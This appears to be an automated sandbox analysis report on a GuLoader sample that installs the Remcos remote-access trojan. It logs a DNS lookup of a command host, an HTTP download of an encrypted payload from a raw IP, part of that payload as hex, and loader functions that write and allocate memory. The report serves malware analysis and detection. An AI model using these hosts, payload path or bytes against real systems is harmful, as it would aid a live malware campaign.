Aug 2, 2021 15:16:50.983105898 CEST	53	60875	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:51.757920027 CEST	56448	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:51.782411098 CEST	53	56448	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:52.497798920 CEST	59172	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:52.534377098 CEST	53	59172	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:53.086787939 CEST	62420	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:53.119651079 CEST	53	62420	8.8.8.8	192.168.2.4
Aug 2, 2021 15:17:10.970607996 CEST	60579	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:17:11.005824089 CEST	53	60579	8.8.8.8	192.168.2.4
Aug 2, 2021 15:17:15.650224924 CEST	50183	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:17:15.685762882 CEST	53	50183	8.8.8.8	192.168.2.4
Aug 2, 2021 15:17:19.217799902 CEST	61531	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:17:19.263786077 CEST	53	61531	8.8.8.8	192.168.2.4
Aug 2, 2021 15:17:48.299998045 CEST	49228	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:17:48.334119081 CEST	53	49228	8.8.8.8	192.168.2.4
Aug 2, 2021 15:20:41.980040073 CEST	59794	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:20:42.004930019 CEST	53	59794	8.8.8.8	192.168.2.4
Aug 2, 2021 15:20:42.479918957 CEST	55916	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:20:42.524019957 CEST	53	55916	8.8.8.8	192.168.2.4
Aug 2, 2021 15:20:46.058964968 CEST	52752	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:20:46.099714041 CEST	53	52752	8.8.8.8	192.168.2.4
Aug 2, 2021 15:20:50.367840052 CEST	60542	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:20:50.417256117 CEST	53	60542	8.8.8.8	192.168.2.4
Aug 2, 2021 15:20:51.634783030 CEST	60689	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:20:51.690402985 CEST	53	60689	8.8.8.8	192.168.2.4
Aug 2, 2021 15:22:49.935353041 CEST	64206	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:22:49.975924969 CEST	53	64206	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 2, 2021 15:17:48.299998045 CEST	192.168.2.4	8.8.8.8	0xe5e6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 2, 2021 15:16:14.163957119 CEST	8.8.8.8	192.168.2.4	0x52b2	No error (0)	a-0019.a.dns.azurefd.net	a-0019.standard.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Aug 2, 2021 15:17:48.334119081 CEST	8.8.8.8	192.168.2.4	0xe5e6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 2, 2021 15:20:42.004930019 CEST	8.8.8.8	192.168.2.4	0x2953	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

101.99.94.119

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49758	101.99.94.119	80	C:\Users\user\Desktop\kGSHiWbgq9.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 15:17:47.258838892 CEST	8762	OUT	GET /WEALTH_PRUuqVZw139.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache
Aug 2, 2021 15:17:47.311050892 CEST	8763	IN	HTTP/1.1 200 OK Date: Mon, 02 Aug 2021 05:17:46 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Sun, 01 Aug 2021 22:14:12 GMT ETag: "72840-5c886c5bd2c84" Accept-Ranges: bytes Content-Length: 469056 Content-Type: application/octet-stream Data Raw: 02 da 3f 3b 14 7d 1a 6a 97 49 3f 94 5c 82 37 c8 0c ca ec 44 1c 6d c0 32 59 f9 cf d2 b0 1a e7 13 99 e0 d4 67 ec d8 64 6e 95 58 ec b1 4f 94 7f 92 37 39 35 25 0e 6c f3 89 78 b7 14 89 1a b4 26 f2 11 bc 3c b1 1c 0b fb d6 41 4d 17 b6 90 e4 e1 56 be d4 42 8e 30 56 42 72 02 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f bd 1b 63 b0 ea 7e de 40 f0 aa 58 0e 19 69 40 f1 d1 6b f1 62 d6 9c 56 99 d3 55 3a 4c c8 f3 2a 1b 7f 98 48 43 5b 6b 10 cc 6e ca 2c 4f d1 bc 05 59 7c a8 bd 1b e3 26 7b 5f 90 54 72 2d 60 23 c9 eb 7e 5d ec e2 0a 13 8d ba 86 2d 25 4e 20 56 e0 c4 56 b4 da 8c f9 40 35 ce ca 47 61 c1 d5 42 39 36 83 4b 05 13 8e 82 3a 7f 1a 70 78 d3 98 05 7d 70 85 8a 7a b4 55 f9 32 c4 64 02 aa 76 81 23 0d 67 b4 0c 86 01 3c 66 fe 8e 3d 81 d4 a9 fd 53 2d 87 b2 0a 8c 47 cb 99 07 35 0a ea 05 95 85 9a ea 9e 1c b4 42 7b 37 c3 bf 5b d5 08 31 4c 06 8c ae 2a dc 74 43 76 6b 1a 79 74 62 a4 ec 7a e4 b3 33 61 bb 8c f9 8d 24 71 d9 a7 31 0b f7 dd 8d a2 30 60 0f 5d 6b ca 63 ff f3 ad e7 ae 9c 70 5d ab fb cf ab d5 2a 9c 0b c8 8a 06 7a 9e 24 c7 88 e1 fc 5f 55 5d a2 fe e4 58 1e af 6c 38 09 9d 79 ed 0d 1e d1 9b 13 ef bb dd e2 65 05 71 fa 7e 26 bb f5 c9 72 29 42 3c 09 d8 c6 58 89 d2 04 93 17 fc f9 4a ff 0c 29 bd d9 81 ba cb e4 1b 2c 52 78 a4 d9 42 8a 61 95 7c 3e 9a 70 61 f5 c7 73 cf af 4a 80 27 ac 59 a8 a5 a9 49 8b 4d 5f 3c 72 be c5 73 21 12 da 76 7f ba 44 c5 a7 66 6a 8f 02 0d 2c 51 87 6a c1 50 3a 55 43 c6 41 a6 d1 bb 6d db 6f 22 5f 49 7b bc 5d 82 66 82 4b a4 3c d9 82 27 47 0b f0 a6 2a 48 ec 52 1e 40 e4 cc 10 e5 b4 02 68 d3 1c 3b 3c 99 33 d9 13 b9 61 55 a3 8e da ce 48 88 c3 28 d8 13 34 45 1f df b3 20 66 a5 15 3a 2d 26 dc 96 c9 67 30 5c ca 63 b9 34 86 eb 7a fc ff c3 26 06 89 06 ca a1 12 4b 9d f9 57 a7 54 49 70 0a 52 77 83 b6 e9 02 f2 6c 48 f9 74 79 d9 82 16 96 89 9a 7a de b4 90 0f f6 16 6b 07 64 5c 83 16 8f 9d 35 d2 84 8c 59 91 d3 47 b1 2a 4d ad cd 41 07 a6 d3 a3 71 13 43 48 13 55 d1 61 c8 b4 e9 72 ef e4 25 55 23 a3 6c b7 1b 62 c3 ff ed f0 85 26 dc 67 ec 9d b6 82 25 ee ff a9 0b a1 9b 2b e2 53 8e cb 80 d9 08 0e 43 7f ab aa ac e8 48 0c 86 43 08 9d 39 48 04 fc 5a fd cb ff 7f d7 7e 5f cc dd e7 46 9c 10 4c 3d 16 86 e7 3c 91 40 12 5f 01 8e 41 14 23 b5 7b 43 89 4d 4f ad 4f fe 82 56 43 16 6f 60 ec 0e cc 2b 5a f9 2b db 17 89 0a 97 3c 4b 96 7c a4 e1 58 26 05 bd dd b6 55 ab 82 d1 2f 30 a1 29 7c 1d ca aa 24 22 59 fb a1 c2 6e 18 e5 67 5a 05 bf 70 24 a9 54 96 11 ce 4f 01 7c ab 96 38 b4 35 55 08 59 ea ed 23 06 cb 67 22 ff ab ea ab ed 73 ef 40 4f 10 61 66 d5 f0 91 4b 0c 68 4b 13 1b 27 3c 7c 9e cf 12 c2 37 76 5d 5f bc c1 76 8d 4a 87 b9 10 33 69 85 2b e7 99 38 4a d2 a4 a6 09 55 d3 c9 70 5e d8 c0 6d ff 3c fb 56 07 b6 e7 fb 66 8f fb f9 d7 f4 a8 fb 01 0b fa 5c db d2 33 8e 37 1f 9e 99 c1 15 13 ea e1 cd e4 0c 5c e6 ac b1 1f 0b fb d6 45 4d 17 b6 6f 1b e1 56 06 d4 42 8e 30 56 42 72 42 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f ad 1a 63 b0 e4 61 64 4e f0 1e 51 c3 38 d1 41 bd 1c 4a a5 0a bf ef 76 e9 a1 3a 5d 3e a9 9e 0a 78 1e f6 26 2c 2f 4b 72 a9 4e b8 59 21 f1 d5 6b 79 38 Data Ascii: ?;}jI?\7Dm2YgdnXO795%lx&<AMVB0VBr@Z!)bb%GY}P}2c~@Xi@kbVU:LHC[kn,OY\|&{_Tr-`#~]-%N VV@5GaB96K:px}pzU2dv#g<f=S-G5B{7[1LtCvkytbz3a$q10`]kcp]z$_U]Xl8yeq~&r)B<XJ),RxBa\|>pasJ'YIM_<rs!vDfj,QjP:UCAmo"_I{]fK<'GHR@h;<3aUH(4E f:-&g0\c4z&KWTIpRwlHtyzkd\5YG*MAqCHUar%U#lb&g%+SCHC9HZ~_FL=<@_A#{CMOOVCo`+Z+<K\|X&U/0)\|$"YngZp$TO\|85UY#g"s@OafKhK'<\|7v]_vJ3i+8JUp^m<Vf\37\EMoVB0VBrB@Z!)bb%GY}P}2cadNQ8AJv:]>x&,/KrNY!ky8
Aug 2, 2021 15:17:47.311081886 CEST	8765	IN	Data Raw: e7 ee 3b 8e 49 1f 3a be 59 7f 27 44 23 c9 eb 7e 5d ec e2 a0 90 cf 8a 68 cf 09 2d ce b4 cc a7 b8 56 f6 ef a3 3e e8 ad 36 a5 4d a2 8f 3c e6 55 cc a9 29 70 d4 fc e4 1c ea 92 54 b0 7f 9f d5 aa 8a a8 10 d7 cd d8 d6 a7 88 88 f1 32 11 9f ca dc a4 ec aa Data Ascii: ;I:Y'D#~]h-V>6M<U)pT2;*c/,c8$\TQO~N!2}/BUXM$LtPi097ks{COpR_Y'EGWuYgCiJUSeYc)BeYB`Jd
Aug 2, 2021 15:17:47.311098099 CEST	8766	IN	Data Raw: e1 64 8e 39 e6 62 9a 10 ef 6a ad 25 5c 83 a5 d3 cb ed 3f 06 48 8b a9 0e 63 d6 e8 2a be 23 28 e9 99 ef 6f a0 7b d7 ae 0f 73 21 a5 4e e4 33 43 88 ff 76 d2 da c7 ce 56 7e a9 d3 31 f2 50 80 48 44 d5 db cb 16 f4 47 21 e9 f8 4b cc d6 bc 7d 91 c6 7d 0c Data Ascii: d9bj%\?Hc*#(o{s!N3CvV~1PHDG!K}}/rl]L,EDoWqn.54nReq0Q)/Muly+)M/4F.oUEM)g4 FZ)$3:t'(WTr}\n
Aug 2, 2021 15:17:47.311132908 CEST	8767	IN	Data Raw: f7 e4 8f c3 f3 55 f8 ec 29 fb d9 f8 38 5a ea 7a 8c 4d 80 60 56 2e f6 b3 10 d7 da ce c5 2c 43 08 fb 3a 54 9f a1 e9 50 50 66 d8 af da 5c 10 62 a8 5d 6f 8d 4a ed 00 51 e8 a0 a7 c0 1b 35 12 d5 20 a2 3a 3b 90 7d fb ed 57 04 79 c5 b4 72 50 54 ea 1d 8e Data Ascii: U)8ZzM`V.,C:TPPf\b]oJQ5 :;}WyrPT~;Is5kT4OUnXa14Rf1.G&O]WRh)$sr3; 3PAHJvI6.B!u{~^67P_$I#]*t8HW#
Aug 2, 2021 15:17:47.362611055 CEST	8769	IN	Data Raw: be 7b 98 00 ef 8d 61 c7 4d f6 7f d8 c2 c3 0a 49 79 2e e2 53 0b 00 68 2c 84 08 43 2f 20 65 44 05 4a 0c 86 13 e0 2b 28 08 04 a5 c3 57 7f e7 2b 81 f3 1a c4 5f 2c 16 74 84 af 3b 16 0d 15 b7 5a cd cb a5 51 66 85 17 23 b5 84 75 02 82 b0 9d a7 19 93 56 Data Ascii: {aMIy.Sh,C/ eDJ+(W+_,t;ZQf#uVfj:ZpFK?KcU )\|7d`nnOTi(ev1U#S@zkr*a/It?nYK{T3Aq0Ne\?#:tsp^c
Aug 2, 2021 15:17:47.362638950 CEST	8770	IN	Data Raw: 9d 9c d2 3f 31 18 9c 07 49 ec e3 8e e6 f5 26 e0 74 d3 76 44 be 12 f5 d6 09 e0 b0 2f 62 ee 57 6e 43 c5 b1 72 42 67 ea 1d d0 0f 3c f6 87 f4 96 60 15 12 a6 bf 50 88 46 c0 47 3d 3f 0d cb 5d 6e 3d b1 27 71 d9 2c 31 c8 a2 56 61 f4 bb 91 e7 86 96 35 cc Data Ascii: ?1I&tvD/bWnCrBg<`PFG=?]n='q,1Va51&g%e=1ae*Bk<IAmd8,HFdWT~1%XY{MtRp1aw{??w\|q'@Tt^s!BQ^~g,Q'K.AA-3&_P}
Aug 2, 2021 15:17:47.362657070 CEST	8772	IN	Data Raw: f9 9a d3 34 e6 04 5c b1 64 0a a6 bf ae e2 ee 53 c4 2f b6 96 2f 1a 8f 66 a4 f9 71 be 9f ec 4a 4b 15 61 8c 4c ad 4f 55 b3 d6 fe 34 08 72 9a e9 41 3b 29 d3 a2 14 ff 56 02 6e c3 c0 5d f7 a4 da 36 2f 47 7b 8d dc 54 43 e5 2b d0 cf 4a 25 f9 ab bf a0 32 Data Ascii: 4\dS//fqJKaLOU4rA;)Vn]6/G{TC+J%2`n`N*z]&!RZm?^@jrUEjHq6Ki~vk:-?h=j(:^x0vp?PT:b]HoTNE.c0
Aug 2, 2021 15:17:47.362673998 CEST	8773	IN	Data Raw: f1 7d 95 a1 a5 63 90 ea 78 a6 3d 16 65 19 32 1b b6 16 05 82 b9 3f 2a 9b d8 99 6f 54 ce f4 7c 15 65 f5 30 60 0f 6e b9 88 08 78 7e e5 54 a0 dd ba 9b 39 70 4b f6 16 7f 17 e7 a2 88 f9 ef 92 d9 b3 8b 08 ef b7 aa b8 24 3a e8 0f de a7 6c 6d 82 71 7f 1b Data Ascii: }cx=e2?*oT\|e0`nx~T9pK$:lmqktfS~r{iB</~ttT3RxawUsw:-o#I"r&Q;wpfFPhFn2!YRa&_P7ub.V3w,nub^rE
Aug 2, 2021 15:17:47.362695932 CEST	8774	IN	Data Raw: 6b d2 e7 f9 7a e1 79 75 07 0b 2d db 42 02 16 c2 6a 1c 19 8d 4c 39 28 df fa 36 a0 be de b3 b9 0e 58 11 2a e7 94 63 3e 55 9b 35 13 fc c5 cb 6f 4f 6e d1 f9 9d 4a 8f db 2a 94 e2 55 9d c4 cf 36 52 63 c7 4b 6a 0b 53 04 28 e9 23 53 40 8b 33 a9 26 ef 91 Data Ascii: kzyu-BjL9(6Xc>U5oOnJU6RcKjS(#S@3&az`d/l=q7v]1QT8{j0LXd.?vjrgmvL&3ZLXkM>I?^B0Z!/^H`uRY ugAG{
Aug 2, 2021 15:17:47.362715006 CEST	8776	IN	Data Raw: 45 0c 26 f6 bb 10 bb 99 bd f7 59 7a 5e 2a 17 db e3 5d 3d 50 91 a0 62 83 e0 f2 74 10 4f 8c 39 6d 17 08 94 b3 4b 2a cd 9e d4 e7 a6 38 74 ec ec fe e5 6c ab 06 b6 ea 96 8d 42 0a 36 71 6e 4a 3f cf 88 2f 3b 54 2d fb 10 d6 f0 73 0f f3 87 29 96 1e 12 7e Data Ascii: E&Yz^]=PbtO9mK8tlB6qnJ?/;T-s)~B\9n'0+mV<W:"WI_piY"9b<U}eD\^2'<?7Gf3R=Dq~y471Zg=F5FA`7+vAou
Aug 2, 2021 15:17:47.362735033 CEST	8777	IN	Data Raw: 49 3f 03 1d f1 86 d0 01 e0 ee 06 78 20 cc c1 8c 69 a2 27 53 00 de ad ad e0 c7 0b 06 83 97 02 42 c7 f9 34 64 27 eb 20 64 d5 77 b2 67 d0 d3 13 a6 be 05 af 49 b4 a3 ec 8f 1f aa e9 c3 09 68 21 9d 26 c8 89 5e 98 37 0f 75 c8 46 d7 51 d2 d7 96 38 28 20 Data Ascii: I?x i'SB4d' dwgIh!&^7uFQ8( K?t<I5\0MgA>.F*_HN)qTjqfAD"lnLs8ZBlKtnqmg=.^@unAn\|V;-z

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: kGSHiWbgq9.exe PID: 6592 Parent PID: 5872

General

Start time:	15:15:53
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\kGSHiWbgq9.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	27BF14807BC9D5CD2D823293F43C3A3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: kGSHiWbgq9.exe PID: 6636 Parent PID: 6592

General

Start time:	15:16:52
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\kGSHiWbgq9.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	27BF14807BC9D5CD2D823293F43C3A3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: kGSHiWbgq9.exe PID: 6592 Parent PID: 5872 kGSHiWbgq9.exeCOMMON

Executed Functions

Function 020F0BDC, Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 638COMMON

Download Yara Rule

Strings

*D,[, xrefs: 020F1628
b#ao, xrefs: 020F1251
>oU, xrefs: 020F0F0E
7_D, xrefs: 020F0F96
Vk, xrefs: 020F12D0

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: *D,[$7_D$Vk$b#ao$>oU
API String ID: 2167126740-2613622489
Opcode ID: 6e1120a1f3c1e1e15961fec2a924299c9332c8fa4f5667a98d1748df1342ff40
Instruction ID: 4079e26450f3f9a8bbb525a6c161ace95a2b40919c0a615de502c469a6498d28
Opcode Fuzzy Hash: 6e1120a1f3c1e1e15961fec2a924299c9332c8fa4f5667a98d1748df1342ff40
Instruction Fuzzy Hash: 27423172A44385CFDBB59F38C8887EE7BA2AF49310F45412EDD8D9BA54D3319981CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0B59, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 439COMMON

Download Yara Rule

Strings

b#ao, xrefs: 020F1251
^, xrefs: 020F0B54, 020F0BCD
>oU, xrefs: 020F0F0E
7_D, xrefs: 020F0F96
Vk, xrefs: 020F12D0

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: 7_D$Vk$b#ao$>oU$^
API String ID: 2616484454-147858774
Opcode ID: 86abd3d99dbedbedd5e7fccd9efcc069cb7e9e98bbd104a836fefbab41da675c
Instruction ID: 260a0b1f67482ce6689e841ffcd4a9e85ec18e087567c9418a780ffbf0ce7768
Opcode Fuzzy Hash: 86abd3d99dbedbedd5e7fccd9efcc069cb7e9e98bbd104a836fefbab41da675c
Instruction Fuzzy Hash: 93021171A443898FDFB59F38CC44BEE7AA2AF49310F45812EDD8D9BA44C7355A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0CFA, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 401COMMON

Download Yara Rule

Strings

b#ao, xrefs: 020F1251
>oU, xrefs: 020F0F0E
7_D, xrefs: 020F0F96
Vk, xrefs: 020F12D0

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7_D$Vk$b#ao$>oU
API String ID: 0-3891533994
Opcode ID: ba83a7c9a3f2a4c4d6b2c79b119a4f89fdd32670c5640c0945186d70ce62736a
Instruction ID: 58240dc35c3a07d8395cc74f10626e481c43afdee02d8ec05139ddf16b5bebfb
Opcode Fuzzy Hash: ba83a7c9a3f2a4c4d6b2c79b119a4f89fdd32670c5640c0945186d70ce62736a
Instruction Fuzzy Hash: 46F11071A443898FDFB59F38C884BEE7AA2AF49310F45412EDD8DDBA44C7355A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0DD5, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 361COMMON

Download Yara Rule

Strings

b#ao, xrefs: 020F1251
>oU, xrefs: 020F0F0E
7_D, xrefs: 020F0F96
Vk, xrefs: 020F12D0

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7_D$Vk$b#ao$>oU
API String ID: 0-3891533994
Opcode ID: 57ba1a251d74c344e4be6d70d0bb8c6cee090ab2ad698ad731f6bb98f52d6b70
Instruction ID: aa673cbd6b650b8481e1504a6ca000b8e2cfb3051ef04e1b09b734405cab012d
Opcode Fuzzy Hash: 57ba1a251d74c344e4be6d70d0bb8c6cee090ab2ad698ad731f6bb98f52d6b70
Instruction Fuzzy Hash: 6EE12F31A44385CFDFB59F3888847EE7BA2AF59310F85821ECC89DBA54C7359981CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0ED2, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 303COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(B3E55E3C), ref: 020F5581

Strings

b#ao, xrefs: 020F1251
>oU, xrefs: 020F0F0E
7_D, xrefs: 020F0F96
Vk, xrefs: 020F12D0

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: 7_D$Vk$b#ao$>oU
API String ID: 560597551-3891533994
Opcode ID: 08e96a8a81e893d89c580bce2ffca049db77cf82a0c279760fe85b63d7e47a70
Instruction ID: fb968d79f35bb5c4d37d9a39d59584f6f242e1081d3178871d72c7a24275e281
Opcode Fuzzy Hash: 08e96a8a81e893d89c580bce2ffca049db77cf82a0c279760fe85b63d7e47a70
Instruction Fuzzy Hash: 82C13371A44389CFDFB59F3888447EE7BA2AF59310F85821EDC8D9BA94C3359941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F2873, Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 983libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

Strings

`~vG, xrefs: 020F4FB1
}W31, xrefs: 020F4DD7

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: `~vG$}W31
API String ID: 1029625771-4278674903
Opcode ID: 2b8db5e92af0083dd73be30ae2420b39bfd3d7f40956ade7386d94f8ba640fc1
Instruction ID: d1e3a96a5df67c4bba6a81f88c95fb13aac59a09c4e22e2235ab9f67275d8946
Opcode Fuzzy Hash: 2b8db5e92af0083dd73be30ae2420b39bfd3d7f40956ade7386d94f8ba640fc1
Instruction Fuzzy Hash: B192FFB26443899FDBB49F78CD85BDABBA2FF54310F45412ADD899B610D3309A81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 020F5A62, Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 746memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020F73C3: LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

NtAllocateVirtualMemory.NTDLL(-00000001A3861579), ref: 020F5BA5

Strings

`~vG, xrefs: 020F4FB1
}W31, xrefs: 020F4DD7

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: `~vG$}W31
API String ID: 2616484454-4278674903
Opcode ID: d35ea345be435f3d01ea05bf63d53c6bf81cf66891089e887132984cb900084b
Instruction ID: bc0ef93f6f5b0a3f2401ec0cff0a5c9618ccde6a824446e4b27a7bc26d3ff474
Opcode Fuzzy Hash: d35ea345be435f3d01ea05bf63d53c6bf81cf66891089e887132984cb900084b
Instruction Fuzzy Hash: AC62DAB2644389DFDBB49F28CD85BDABBA2FF55300F45412ADD899B610D3309A81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 020F853B, Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 810COMMON

Download Yara Rule

Strings

^=b, xrefs: 020F0AB9
^, xrefs: 020F0B54

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: ^=b$^
API String ID: 3389902171-3094246518
Opcode ID: 3201a4f0957fa138c6d7eea56d39bc7c4d94dbdad89dfc8ecb1d64222a1a7f53
Instruction ID: 888ce00ca42683f1865d6a504bc277f6366fd7c1b679bb219ca741429f283cc0
Opcode Fuzzy Hash: 3201a4f0957fa138c6d7eea56d39bc7c4d94dbdad89dfc8ecb1d64222a1a7f53
Instruction Fuzzy Hash: 5E7248715483858FDFB5CF38CC887DABBE2AF56310F49816ACC899B696D3308945CB12

Uniqueness

Uniqueness Score: -1.00%

Function 020F7A7A, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 650COMMON

Download Yara Rule

Strings

`~vG, xrefs: 020F4FB1
}W31, xrefs: 020F4DD7

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `~vG$}W31
API String ID: 0-4278674903
Opcode ID: 1a5936e5b171e777932952c82aadff24f7c13fc8aa1fd2d9c016e29e4e153694
Instruction ID: 4a2ff11c00fa0ef8157b7eab5985788d002c40f78338f69058f580871529ec79
Opcode Fuzzy Hash: 1a5936e5b171e777932952c82aadff24f7c13fc8aa1fd2d9c016e29e4e153694
Instruction Fuzzy Hash: B052D9B26443899FDBB48F28CD85BDABBB2FF54300F45412ADD899B610D3349A85CF42

Uniqueness

Uniqueness Score: -1.00%

Function 020F443A, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 633nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020F73C3: LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

NtWriteVirtualMemory.NTDLL(?,7DF508C5,?,00000000,?,?,?,?,D64511AE), ref: 020F50DE

Strings

`~vG, xrefs: 020F4FB1
}W31, xrefs: 020F4DD7

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: `~vG$}W31
API String ID: 3569954152-4278674903
Opcode ID: a350b94828b7b39dbc3accedeb31fa3fe1d046191e4877beeb9b8d26eb043638
Instruction ID: 42864630073706ec981c054358cffd832959ffeb3bdb33df1b65732a3474d03d
Opcode Fuzzy Hash: a350b94828b7b39dbc3accedeb31fa3fe1d046191e4877beeb9b8d26eb043638
Instruction Fuzzy Hash: 8D52C9B26443899FDBB49F28CD85BDABBB2FF54300F45412ADD899B610D3349A85CF42

Uniqueness

Uniqueness Score: -1.00%

Function 020F4B7C, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 336COMMON

Download Yara Rule

Strings

`~vG, xrefs: 020F4FB1
}W31, xrefs: 020F4DD7

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `~vG$}W31
API String ID: 0-4278674903
Opcode ID: 08d2133a83c8843b1c6c032862d7538af8f786d148296d311b8afe1e39744499
Instruction ID: bca0c8155b7901648fef68fe3d552e03323ba57e5a49cd305e10e944233b0a33
Opcode Fuzzy Hash: 08d2133a83c8843b1c6c032862d7538af8f786d148296d311b8afe1e39744499
Instruction Fuzzy Hash: ECE1EBB2644388DFCBB58F28DD857DE7BA2FF58300F45451AEE899B610D3709A858F42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0691, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 298libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

Strings

^=b, xrefs: 020F0AB9
